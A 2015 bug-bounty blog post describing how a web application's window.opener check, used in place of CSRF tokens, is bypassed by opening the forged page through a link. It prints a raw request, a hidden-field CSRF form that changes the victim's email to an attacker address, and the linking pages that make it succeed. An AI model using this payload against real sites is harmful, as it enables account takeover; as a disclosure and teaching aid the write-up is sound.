Tuesday 31 March 2015

Abusing Windows Opener To Bypass Certain Restriction ( CSRF Bypass )



Hello all =D , Hope you are doing well

Today we will see that how we can Abuse Windows Opener function to bypass certain restriction in web application.

So first lets see what is Windows Opener Function

According To Mozilla Developer Guide 

When a window is opened from another window, it maintains a reference to that first window aswindow.opener. If the current window has no opener, this method returns NULL.  Windows Phone browser does not support window.opener.  It is also not supported in IE if the opener is in a different security zone.

===================================================================


Apart from this many peoples used this for security like preventing CSRF Attack without using any tokens and referrer check i guess =D

This functions supported in all browser



While doing bug bounties i found that relay on windows opener is not enough to prevent certain common attacks like CSRF specially, Lets see how its work.



Here i am not disclosing the site name but tried to replicate the same issue in my own local host :)

While doing testing i found that this web application is vulnerable to CSRF Attack , Here is the Demo HTTP Header for this

POST /home/accountsettings HTTP/1.1
Host: anything.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bhati.com/
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

newemail=attacker@something.com&Submit=Save

As you can see there is no csrf tokens , So we can say that its vulnerable to CSRF Attack.

So for POC i create a CSRF page.

<html>
<body>
<form action="http://anything.com:8080/home/accountsettings" method="POST">
<input type="hidden" name="newemail" value="attacker&#64;something&#46;com" />
<input type="hidden" name="Submit" value="Save" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

After executing this page , application logged out me immediately :( , i was thinking that i done some mistake and execute the CSRF page again , and as unexpected the application logged me out again.

So i look around there to find the reason behind this action, After some time i tried to access any other authenticated page in a new tab And Again application logged me out immediately.

I just tried to access an authenticated page in a new tab and application logged me out again  !  Means you can only travel in the web application by clicking there own links , That is weird ! i was so curious to find the reason behind this

At that time i was thinking that may be this application is protected by Referrer Check CSRF, So i also tried to giving him a referrer value manually by using proxy.But the result is same .The application is logging me out whenever i tried to open a new page in a new tab or doing CSRF Attack, And i was like.



After some time i looked in to the source code and found an interesting javascript code which was the reason behind this

The code was like

<script>
        if(window.opener ==null){
            top.location.href="/homedirectory/kickedoutuser";
        }
    </script>

By looking at source code ( Some Google =D ) we can clearly say that if Windows Opener value is null then application will simply logged us out immediately.

So now we have to create a Opener Value =D , href is the simple way to create it.


So i created a Href tag html file in my local host which contents the href to that authenticated page. Now its time to test that "can we use this technique to access that page in a new tab without getting logged out !"

=================================================================

<h1> welcome to home page</h1><a href="http://anything.com/home/accounts.php">Click Here For Magic</a>

=================================================================


After click on that link , i was able to access to that page , and this time web application is not logged me out , Because we have already setting up the Windows Opener value by using Href.


Now next thing is to Test this same technique for exploiting CSRF Attack.


As same as previous code i setting up the csrf html page in my local host like this.

<html>
<body>
<form action="http://anything.com:8080/home/accountsettings" method="POST">
<input type="hidden" name="newemail" value="attacker&#64;something&#46;com" />
<input type="hidden" name="Submit" value="Save" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

[ save these code as test.html file in my local host]



================================================================

<h1> welcome to home page</h1><a href="http://127.0.0.1/test.html">Click Here For Magic</a>

==================================================================

And boom after this i was able to perform CSRF Attack ! And i was like









So this was about Abusing Windows Opener ,Thanks for the reading this , If i done any mistakes then let me know

Comments are always welcome :)


2 comments:

  1. :3 same cheez maine kii thi ! it was working on windows mail ! :/ bug bounty nai di ! n bug patched ! :3

    ReplyDelete